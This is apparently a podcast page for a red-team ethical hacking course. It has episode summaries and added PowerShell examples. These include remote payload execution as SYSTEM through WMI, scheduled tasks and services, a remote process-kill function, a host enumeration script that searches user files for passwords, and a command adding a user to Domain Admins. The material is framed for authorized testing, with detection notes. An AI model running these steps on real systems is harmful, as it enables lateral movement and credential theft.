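#    Invoke-CimMethod -ComputerName $target -ClassName Win32_Process -MethodName Create -Arguments @{ CommandLine = $payload }

# 2. Scheduled task as SYSTEM. '/sc once' requires a '/st' time, so the task is started
#    explicitly with '/run' and deleted afterwards. Creation is Security Event ID 4698
#    where task auditing is enabled; the payload's parent is the Schedule service's svchost.exe.
schtasks /s $target /create /tn "Maint\Check" /tr $payload /sc once /st 00:00 /ru SYSTEM /f
schtasks /s $target /run    /tn "Maint\Check"
schtasks /s $target /delete /tn "Maint\Check" /f

# 3. Service Control Manager as SYSTEM. Use sc.exe explicitly ('sc' is a PowerShell alias for
#    Set-Content) and keep the space after 'binPath='. Installation is System Event ID 7045;
#    the payload's parent is services.exe. A non-service binary is killed after the start
#    timeout with error 1053.
sc.exe \\$target create CheckSvc binPath= $payload start= demand
sc.exe \\$target start  CheckSvc
sc.exe \\$target delete CheckSvc

# Remove the staged file once the payload has exited.
Remove-Item "\\$target\C$\Windows\Temp\svc_check.exe"
```

    The three parent processes noted in the comments (WmiPrvSE.exe, the Schedule service’s svchost.exe, services.exe) are how a blue team tells the methods apart in Sysmon process-creation events, which is the detection-engineering value the lesson attributes to learning the manual forms.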

    10 minutes
  5. Course 16 - Red Team Ethical Hacking Beginner Course | Episode 4: Windows Post-Exploitation: Remote File Management and System Control

    4 days ago

    Course 16 - Red Team Ethical Hacking Beginner Course | Episode 4: Windows Post-Exploitation: Remote File Management and System Control

    In this lesson, you’ll learn about:
    - The role of post-exploitation in red team operations
    - Why redundancy is critical for operational reliability
    - Multiple ethical techniques for file handling, execution, and process control
    - Methods for controlled system impact and disruption
    - The importance of cleanup and reversibility in professional engagements

    Overview
    This lesson provides a technical demonstration of post-exploitation techniques used by red team professionals after initial access has been achieved. The focus is not on gaining access, but on maintaining control, executing actions reliably, and manipulating system behavior in a controlled and reversible manner. A central theme of this episode is redundancy. Professional red teamers must know multiple ways to perform the same task, ensuring mission success even if certain tools, permissions, or frameworks are unavailable. All techniques are presented in an ethical, authorized testing context, aligned with real-world red team operations and the MITRE ATT&CK framework.

    1. File Transfer and Management
    Post-exploitation frequently requires moving tools, logs, or evidence between systems.
    Automated File Handling
    Command and Control (C2) frameworks often provide built-in file operations such as:
    - Uploading payloads
    - Downloading collected data
    - Copying files across directories or systems
    These features simplify operations but should never be relied on exclusively.
    Manual File Transfer (Fallback Method)
    When automated tools are unavailable, red teamers can rely on:
    - Temporary SMB shares hosted on their own system
    - Native Windows file copy functionality (copy, xcopy, robocopy, Copy-Item), including copies to and from the administrative shares (C$, ADMIN$) of hosts they already administer
    This approach reinforces the principle of tool independence, ensuring operations can continue using built-in system capabilities.

    2. Local and Remote Process Termination
    Managing running processes is essential for:
    - Removing artifacts
    - Releasing locked files
    - Stopping unstable or suspicious processes
    - Cleaning up after execution
    Process Identification
    Enumerating running processes to identify:
    - Process names
    - Associated Process IDs (PIDs)
    - Execution context
    Termination Techniques
    - Local process termination using native Windows utilities (taskkill, Stop-Process)
    - Remote process termination against authorized targets (taskkill /S, or the Terminate method of WMI’s Win32_Process class)
    - Alternative approaches using Windows management interfaces
    Redundancy ensures that if one method fails, another can be used to achieve the same goal.

    3. Execution Methods
    Execution techniques allow red teamers to:
    - Launch payloads
    - Run administrative actions
    - Establish persistence
    - Test detection and response mechanisms
    Service-Based Execution
    - Creating and starting services remotely
    - Services often execute with elevated privileges
    - Commonly used to test privilege escalation and detection logic
    Scheduled Task Execution
    - Creating tasks that run immediately, execute on startup, or trigger at defined intervals
    - Often used for persistence testing and delayed execution scenarios
    Remote Process Creation
    - Leveraging system management interfaces (WMI) to execute files silently
    -  Avoiding interactive sessions
    - Testing endpoint monitoring visibility

    4. System Impact: Shutdown, Reboot, and Logoff
    This section aligns closely with MITRE ATT&CK Impact techniques (System Shutdown/Reboot, T1529), demonstrating how system availability can be influenced during authorized engagements.
    Standard System Control
    - Rebooting systems
    - Shutting down machines
    - Logging users off locally or remotely
    These actions are used to:
    - Test incident response workflows
    - Observe detection mechanisms
    - Evaluate business continuity controls
    Advanced Automation
    Scripted actions to:
    - Force logoffs
    - Trigger shutdowns
    - Execute repeated system events
    Such techniques demonstrate how attackers could disrupt availability, but in red teaming they are used only in controlled, pre-approved scenarios.

    Professional Responsibility and Cleanup
    A critical takeaway emphasized throughout this lesson is responsibility. Every disruptive action must have:
    - A clear purpose
    - An approved scope
    - A documented rollback plan
    Red teamers must always:
    - Remove persistence mechanisms
    - Restore system stability
    - Leave the environment as they found it
    Failure to clean up can cause real harm, which is unacceptable in professional security testing.

    Conceptual Analogy
    Think of post-exploitation as using the remote control of a smart building:
    - File transfer is like moving furniture between rooms
    - Killing a process is like turning off an appliance that’s in the way
    - Scheduled tasks are like programming lights or alarms
    - Reboots are equivalent to cutting power to test backup systems
    The goal is observation and validation, not destruction.

    Key Educational Takeaways
    - Post-exploitation is about control, not chaos
    - Redundancy ensures operational resilience
    - Native system tools are as important as advanced frameworks
    - Disruption must always be reversible
    - Cleanup is a professional obligation, not an option

    You can listen and download our episodes for free on more than 10 different platforms: https://linktr.ee/cybercode_academy
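    The redundancy principle from section 2 above, implemented rather than described: one goal (stop a named process on a local or remote host) and three native routes tried in order until one succeeds. This is an added example, not code from the episode. The function name, the ordering of the methods and the notepad.exe dry run at the end are choices made for this example; remote use assumes administrative rights on the target and that at least one of DCOM, WinRM or the RPC path taskkill uses is reachable.

```powershell
# Added example; not from the episode. One task, several native routes, tried
# in order. Function name and method order are choices made for this example.
function Stop-ProcessRedundant {
    param(
        [Parameter(Mandatory)][string]$Name,                 # image name without .exe
        [string]$ComputerName = $env:COMPUTERNAME
    )
    $isLocal = $ComputerName -eq $env:COMPUTERNAME
    $cimArgs = if ($isLocal) { @{} } else { @{ ComputerName = $ComputerName } }

    # Quietest and most specific method first; each one throws on failure so the loop moves on.
    $methods = [ordered]@{
        'Stop-Process (PowerShell, local only)' = {
            if (-not $isLocal) { throw 'remote target' }
            Get-Process -Name $Name -ErrorAction Stop | Stop-Process -Force -ErrorAction Stop
        }
        'Win32_Process.Terminate (WMI over DCOM or WinRM)' = {
            $procs = Get-CimInstance Win32_Process -Filter "Name='$Name.exe'" @cimArgs -ErrorAction Stop
            if (-not $procs) { throw 'no such process' }
            $procs | Invoke-CimMethod -MethodName Terminate -ErrorAction Stop | Out-Null
        }
        'taskkill.exe (RPC)' = {
            $null = taskkill /S $ComputerName /IM "$Name.exe" /F 2>&1
            if ($LASTEXITCODE -ne 0) { throw "taskkill exit code $LASTEXITCODE" }
        }
    }

    foreach ($label in $methods.Keys) {
        try {
            & $methods[$label]
            return [pscustomobject]@{ Process = $Name; Host = $ComputerName; MethodUsed = $label }
        } catch {
            Write-Verbose "$label failed: $($_.Exception.Message)"
        }
    }
    throw "Every termination method failed for $Name on $ComputerName"
}

# Local dry run against a harmless process; -Verbose shows which routes were skipped or failed.
Start-Process notepad.exe
Start-Sleep -Seconds 1
Stop-ProcessRedundant -Name notepad -Verbose
```

    The returned object records which route finally worked, which is worth keeping in the engagement log: it tells the blue team afterwards which interface (PowerShell process API, WMI, or the RPC path taskkill uses) they did or did not see, which is the same coverage question the Sysmon episode raises from the defender’s side.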

    15 minutes
  6. Course 16 - Red Team Ethical Hacking Beginner Course | Episode 3: Essential Windows Domain and Host Enumeration

    5 days ago

    Course 16 - Red Team Ethical Hacking Beginner Course | Episode 3: Essential Windows Domain and Host Enumeration

    In this lesson, you’ll learn about:
    - The purpose and importance of network enumeration in red teaming
    - Windows Domain Enumeration techniques for situational awareness
    - Host Enumeration methods for analyzing a specific target system
    - How user sessions, services, and processes influence attack paths
    - Why continuous enumeration is critical in dynamic enterprise networks

    Overview
    This lesson provides a comprehensive guide to essential red team enumeration techniques used to gather intelligence within a Windows enterprise environment. Enumeration is a critical phase of any red team operation, as it allows security professionals to understand the structure, users, systems, and behavior of a network without relying on exploits. The lesson is divided into two main areas:
    - Domain Enumeration: gathering network-wide intelligence
    - Host Enumeration: collecting detailed information from a specific system

    Domain Enumeration
    Domain enumeration focuses on identifying high-level Active Directory information that helps red teamers understand how the environment is structured and where valuable targets exist.
    Identifying Domain Information
    - Discovering the current domain name (e.g., fun.com)
    - Identifying the Domain Controller (DC) and its IP address
    - Confirming domain role ownership and authentication authority
    Domain Policy and Infrastructure
    - Retrieving domain policies to understand password requirements, lockout thresholds, and security enforcement levels
    - Enumerating domain-joined computer hostnames
    User Session Enumeration
    One of the most critical objectives of domain enumeration is identifying logged-in users, since their credentials and tokens may reside in memory (LSASS) on the hosts where they are logged in. Techniques demonstrated include:
    - Listing users logged into all domain computers
    - Identifying privileged accounts logged into sensitive systems (e.g., administrators on the domain controller)
    - Detecting regular users logged into workstations
    - Narrowing enumeration to a specific target host to identify active sessions
    This information is highly time-sensitive, as logged-in users can change frequently. Querying sessions on many hosts is also itself observable: each remote query produces a network logon (Security Event ID 4624, logon type 3) on the host asked.

    Host Enumeration
    Host enumeration focuses on gathering deep, system-level intelligence from a specific target machine once access has been obtained.
    Basic System Information
    - Hostname
    - Operating system version (e.g., Windows 10 Enterprise)
    - System architecture (x64 / x86)
    - Domain membership
    - Installed hotfixes and patch level
    Current User Intelligence
    - Logged-in username
    - User Security Identifier (SID); the domain part of the SID is embedded in forged Kerberos tickets, which is why ticket-based attacks need it
    - Group memberships
    - Assigned user privileges
    Local Privilege Analysis
    - Enumerating members of the local Administrators group
    - Identifying misconfigurations or excessive privileges
    Service and Process Enumeration
    Understanding what is running on a system reveals potential attack surfaces and persistence opportunities.
    Services
    - Listing running services
    - Identifying startup services
    - Analyzing service state and startup mode
    - Detecting services running with elevated privileges
    Ports and Processes
    - Enumerating open and listening ports
    - Identifying processes bound to specific ports
    - Mapping processes to process IDs, executable names, and full file system paths
    This helps determine whether a service is custom, outdated, or potentially vulnerable.

    Application and File System Enumeration
    Installed Applications
    - Listing installed software (e.g., packet analyzers like Wireshark)
    - Identifying tools that may indicate developer systems, admin workstations, or a security monitoring presence
    File System Analysis
    - Recursively searching the file system for files containing specific text
    - Locating files by name (e.g., flags or configuration files)
    - Identifying hidden files and directories
    These techniques help uncover credentials, scripts, backups, or sensitive data.

    Why Enumeration Is Critical
    - Network environments are dynamic
    - Logged-in users change constantly
    - Services may restart or move
    - New systems may appear or disappear
    Because of this, enumeration is not a one-time activity; it must be continuous throughout a red team operation.

    Key Educational Takeaways
    - Enumeration builds context, not exploits
    - Logged-in users often matter more than vulnerabilities
    - Privileges and services define real attack paths
    - Native system tools provide powerful visibility
    - Effective red teaming depends on accurate, up-to-date intelligence

    You can listen and download our episodes for free on more than 10 different platforms: https://linktr.ee/cybercode_academy
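    The host enumeration checklist above as a single read-only pass in native PowerShell, covering domain context, the current user and SID, other logged-on users, patch level, services outside the Windows directory, listening ports mapped to their binaries, installed software and a credential sweep of the profiles tree. This is an added example, not the episode’s own commands; the regular expressions used for the credential search and the choice of file extensions are assumptions made for this example, and the domain queries need a reachable domain controller.

```powershell
# Added example; not from the episode. Read-only host enumeration with native
# commands and cmdlets; run on a domain-joined Windows host. Nothing is changed.

# --- Domain context ---
$cs = Get-CimInstance Win32_ComputerSystem
"Host: $($cs.Name)   Domain: $($cs.Domain)   Joined: $($cs.PartOfDomain)"
nltest /dsgetdc:$($cs.Domain)       # which DC answers for this domain, and its address
net accounts /domain                # minimum password length, lockout threshold, max age

# --- Current user: name, SID (needed later for ticket-based attacks), groups, privileges ---
whoami /user
whoami /groups | Select-String 'Admin'
whoami /priv   | Select-String 'Enabled'
Get-LocalGroupMember -Group Administrators | Select-Object Name, ObjectClass, PrincipalSource

# --- Who else is logged on: their credentials may be cached in LSASS ---
query user 2>$null                  # interactive and RDP sessions
Get-CimInstance Win32_LoggedOnUser |
    ForEach-Object { "$($_.Antecedent.Domain)\$($_.Antecedent.Name)" } |
    Sort-Object -Unique

# --- OS build and patch level ---
$os = Get-CimInstance Win32_OperatingSystem
"OS: $($os.Caption) $($os.Version) $($os.OSArchitecture)"
Get-HotFix | Sort-Object InstalledOn -Descending | Select-Object -First 5 HotFixID, InstalledOn

# --- Services: running, outside the Windows directory, and the account they run as ---
Get-CimInstance Win32_Service |
    Where-Object { $_.State -eq 'Running' -and $_.PathName -notlike "$env:SystemRoot*" } |
    Select-Object Name, StartName, StartMode, PathName | Format-Table -AutoSize -Wrap

# --- Listening TCP ports mapped to the owning process and its binary ---
Get-NetTCPConnection -State Listen |
    ForEach-Object {
        $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
        [pscustomobject]@{ Port = $_.LocalPort; ProcessId = $_.OwningProcess; Process = $p.ProcessName; Path = $p.Path }
    } | Sort-Object Port -Unique | Format-Table -AutoSize

# --- Installed software from both uninstall hives (64-bit and 32-bit) ---
Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*',
                 'HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*' -ErrorAction SilentlyContinue |
    Where-Object DisplayName | Sort-Object DisplayName | Select-Object DisplayName, DisplayVersion

# --- Files likely to hold credentials: scripts and configs under the profiles tree (patterns are a starting point) ---
Get-ChildItem -Path C:\Users -Recurse -Force -Include *.ps1,*.bat,*.cmd,*.config,*.xml,*.txt -ErrorAction SilentlyContinue |
    Select-String -Pattern 'password\s*[:=]','passwd','pwd\s*[:=]' -List |
    Select-Object Path, LineNumber, Line
```

    Everything here is read-only, but not silent: the domain queries touch a domain controller, and the recursive file sweep is exactly the kind of burst of file reads an EDR baseline notices, so on a real engagement the last block is scoped to directories of interest rather than the whole profiles tree. Because the session list changes minute to minute, the “Who else is logged on” block is the one to re-run, which is the continuous-enumeration point the lesson ends on.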

    12 minutes
  7. Course 16 - Red Team Ethical Hacking Beginner Course | Episode 2: Essential Command Line Administration: Linux, Windows, Account Management

    6 days ago

    Course 16 - Red Team Ethical Hacking Beginner Course | Episode 2: Essential Command Line Administration: Linux, Windows, Account Management

    In this lesson, you’ll learn about: Essential Linux command-line administration basicsCore Windows command-line networking and system commandsHow to navigate, inspect, and manage files on both platformsPractical Windows domain user and group managementWhy command-line proficiency is critical for security professionalsOverview This lesson provides a foundational overview of essential command-line administration techniques used in both Linux and Windows environments. These skills are fundamental for cybersecurity professionals, system administrators, and red team members, as many security operations rely on native command-line utilities rather than graphical interfaces. The lesson concludes with Windows domain account management, an important topic for understanding enterprise environments. Linux Administration Commands The first segment introduces commonly used Linux commands within Kali Linux, focusing on basic system interaction and networking awareness. File System and Directory Management Navigating directories using cdListing directory contents using lsCreating directories using mkdirCreating files and writing content using echoViewing file contents using catRemoving files using rmRecursively listing directory contents using ls -rNetworking and Interface Management Viewing network interface information using:ifconfigip a (modern replacement)Viewing routing information using:ip rnetstat -rnRestarting networking services using:service networking restartManually disabling and enabling interfaces using:ifconfig eth0 downifconfig eth0 upHelp and Documentation Using the --help flag to view command optionsUsing the man command to read full manual pages and understand command parametersThis section emphasizes learning how to explore command capabilities independently, a critical skill in real-world environments. 
    Windows Administration Commands

    The second segment focuses on Windows command-line administration, helping students become comfortable working with Windows systems without relying on graphical tools.

    System and Network Information
    - hostname – displays the computer name
    - ping – checks network connectivity using ICMP packets; demonstrated with the loopback address, using -n to limit the number of packets
    - ipconfig /all – displays detailed network configuration
    - nslookup – resolves domain names to IP addresses
    - netstat -nao – shows active connections, listening ports, and process IDs
    - route print – displays the routing table
    - arp -a – shows IP-to-MAC address mappings

    File and Directory Management
    - Listing directory contents using dir
    - Navigating directories using cd
    - Creating files using echo
    - Viewing file contents using type

    Command Help and Error Handling
    - Using /? to display command usage and parameters
    - Using net helpmsg to translate Windows error codes into readable messages

    This section highlights how attackers and defenders alike rely heavily on native Windows tools.

    Windows Domain Account Management

    The final segment introduces command-line management of users and groups in a Windows domain, a crucial concept in enterprise security environments.

    User and Group Enumeration
    - net user <user> /domain – checks a user's status, identifies whether the account is active, and confirms group memberships (e.g., domain admin)
    - net users /domain – lists all domain users
    - net group /domain – lists all domain groups
    - net group <group name> /domain – displays the users belonging to a specific group

    Managing Domain Privileges
    - Adding a user to domain administrators: net group "domain admins" <user> /add /domain
    - Removing a user from domain administrators: the same command with the /delete parameter
    - Activating a disabled domain account: net user <user> /active:yes /domain

    These commands demonstrate how domain permissions are controlled and why privileged access must be carefully protected.
    WMIC as an Alternative
    - wmic group list brief
    - wmic useraccount list brief

    WMIC provides a concise way to list users and groups and is often used for quick reconnaissance and administration.

    Key Educational Takeaways
    - Command-line tools exist on every system and are powerful by design
    - Many security operations depend on native utilities rather than exploits
    - Understanding system administration improves both offensive and defensive skills
    - Domain environments require careful privilege management
    - Strong visibility and auditing are essential to prevent misuse

    You can listen and download our episodes for free on more than 10 different platforms: https://linktr.ee/cybercode_academy
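    The episode's last takeaway is that privileged group membership needs auditing. As an added example (not from the episode), this PowerShell script parses the text that `net group "Domain Admins" /domain` prints and compares the members against an approved baseline; the sample output, the baseline list and the account names are constructed, and it assumes member names contain no spaces.

```powershell
# Added example: audit Domain Admins membership against an approved baseline.
# Parses the plain-text output of `net group "<group>" /domain`.

function ConvertFrom-NetGroupOutput {
    param([string[]]$Lines)
    # `net group` prints a header, a dashed separator line, then member
    # names in whitespace-separated columns, then a status line.
    $inMembers = $false
    foreach ($line in $Lines) {
        if ($line -match '^-{10,}') { $inMembers = $true; continue }
        if ($line -match '^The command completed') { break }
        if ($inMembers -and $line.Trim()) {
            $line.Trim() -split '\s+'      # assumption: no spaces in names
        }
    }
}

function Compare-PrivilegedGroup {
    param([string[]]$Members, [string[]]$Baseline)
    # Unexpected = present in the group but not approved (the alerting case);
    # Missing = approved but no longer present (worth a ticket, not an alert).
    $unexpected = @($Members  | Where-Object { $_ -notin $Baseline })
    $missing    = @($Baseline | Where-Object { $_ -notin $Members })
    [pscustomobject]@{ Unexpected = $unexpected; Missing = $missing }
}

# Constructed sample of what `net group "Domain Admins" /domain` prints.
$sample = @'
Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator            da-alice                 svc-backup
The command completed successfully.
'@ -split "`r?`n"

$baseline = @('Administrator', 'da-alice')   # hypothetical approved list
$members  = ConvertFrom-NetGroupOutput -Lines $sample
$result   = Compare-PrivilegedGroup -Members $members -Baseline $baseline
# On a live domain-joined host, replace $sample with the real output:
#   $sample = net group "Domain Admins" /domain
if ($result.Unexpected) {
    Write-Warning "Unapproved Domain Admins: $($result.Unexpected -join ', ')"
}
```

    With the constructed sample, svc-backup is reported as unapproved; scheduling this comparison and forwarding the warning to a SIEM gives the visibility the takeaways call for.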

    11 minutes
  8. Course 16 - Red Team Ethical Hacking Beginner Course | Episode 1: Introduction to Red Teaming: Concepts, Tools, and Tactics

    29/12/2025

    Course 16 - Red Team Ethical Hacking Beginner Course | Episode 1: Introduction to Red Teaming: Concepts, Tools, and Tactics

    In this lesson, you’ll learn about:
    - The purpose and mindset of red teaming in cybersecurity
    - The difference between red teams and blue teams
    - How the MITRE ATT&CK framework structures real-world attacks
    - Core Windows command-line environments used in security operations
    - The role of Command and Control (C2) frameworks in post-exploitation
    - Widely used red team and post-exploitation analysis tools
    - The concept behind payload handling and controlled demonstrations

    Introduction to Red Teaming

    This lesson provides a comprehensive introduction to red teaming, an adversarial security discipline where professionals simulate real-world attackers to evaluate and strengthen an organization’s defenses. Red teaming goes beyond simple vulnerability scanning and focuses on realistic attack scenarios, long-term access, and stealth. Red teaming is conducted ethically and legally within defined scopes to help organizations understand how attackers think, move, and persist inside networks.

    Red Team vs. Blue Team

    Red Team
    - Simulates real attackers
    - Attempts to bypass defenses
    - Identifies weaknesses in people, processes, and technology
    - Requires creativity, research skills, and deep technical knowledge

    Blue Team
    - Defends the organization
    - Monitors logs (firewalls, IDS, IPS, systems, networks)
    - Detects suspicious activity
    - Responds to and mitigates attacks

    The interaction between red and blue teams improves overall security posture through continuous testing and feedback.

    MITRE ATT&CK Framework

    The MITRE ATT&CK framework is a globally recognized knowledge base documenting adversary behavior based on real-world incidents.
    Key characteristics:
    - Organized into tactics (the attacker’s goal)
    - Techniques explain how goals are achieved
    - Procedures describe real attacks observed in the wild
    - Structured into 12 tactical columns, covering the full attack lifecycle

    Security teams use ATT&CK to:
    - Understand attacker behavior
    - Map defenses to known techniques
    - Improve detection and response strategies

    Essential Windows Command-Line Environments

    Red teamers and defenders must understand native Windows tools because attackers often abuse legitimate utilities.

    Command Prompt (CMD)
    - Traditional Windows command-line interpreter
    - Used for file management, networking, and basic administration
    - Supports batch scripting

    PowerShell
    - Advanced command-line and scripting environment
    - Uses powerful cmdlets
    - Enables automation and deep system management
    - Supports aliases (e.g., ls) for ease of use

    WMIC (Windows Management Instrumentation Command Line)
    - Interface for interacting with WMI
    - Can query system information
    - Manages processes and configurations
    - Works locally or remotely

    Scheduled Tasks
    - Used to automate execution of programs or scripts
    - Can run tasks at specific times or on specific events
    - Often abused for persistence

    Service Control Manager (SCM)
    - Managed via SC.exe
    - Controls Windows services
    - Can create, modify, start, and stop services
    - High-risk if abused, because services run with elevated privileges

    Command and Control (C2) Frameworks

    C2 frameworks allow attackers (and red teamers in controlled exercises) to manage compromised systems remotely after initial access.

    Capabilities typically include:
    - Executing commands remotely
    - Data exfiltration
    - Keylogging and screen capture
    - Lateral movement automation

    Commonly referenced frameworks:
    - Cobalt Strike (commercial, widely used)
    - Covenant (free, .NET-based)
    - Empire (PowerShell-based, no longer maintained)

    Red teamers often modify default C2 behaviors to evade detection and avoid signature-based defenses such as IDS and IPS.
    Advanced Red Team and Post-Exploitation Tools

    PowerSploit
    - Collection of PowerShell modules
    - Covers enumeration, privilege escalation, persistence, and evasion
    - Includes tools like PowerUp

    PowerView
    - Focuses on Active Directory reconnaissance
    - Gathers information about users, groups, trusts, and permissions
    - Helps build situational awareness in domain environments

    BloodHound
    - Visualizes Active Directory relationships
    - Uses a graph database (Neo4j)
    - Identifies privilege escalation paths
    - Shows how a standard user could reach domain admin access

    Mimikatz
    - Known for credential extraction
    - Can retrieve password hashes and credentials from memory
    - Demonstrates weaknesses in credential handling
    - Emphasizes the importance of modern defensive controls

    Impacket
    - Python-based toolkit for network protocol interaction
    - Supports authentication attacks and remote execution techniques
    - Useful for understanding how Windows authentication can be abused

    Metasploit Payload Handling (Conceptual Demonstration)

    The episode concludes with a controlled demonstration explaining how red teamers:
    - Configure listeners
    - Generate payloads for testing purposes
    - Establish sessions on target systems within legal scopes

    This section is intended to help students understand post-exploitation workflows, not to encourage misuse. Emphasis is placed on lab environments and authorization.

    Key Ethical and Defensive Takeaways
    - Red teaming exists to improve security, not harm systems
    - Many attacks abuse legitimate system tools rather than exploits
    - Understanding attacker techniques strengthens defense strategies
    - Frameworks like MITRE ATT&CK bridge offense and defense
    - Visibility, logging, and behavior-based detection are critical

    You can listen and download our episodes for free on more than 10 different platforms: https://linktr.ee/cybercode_academy

    15 minutes
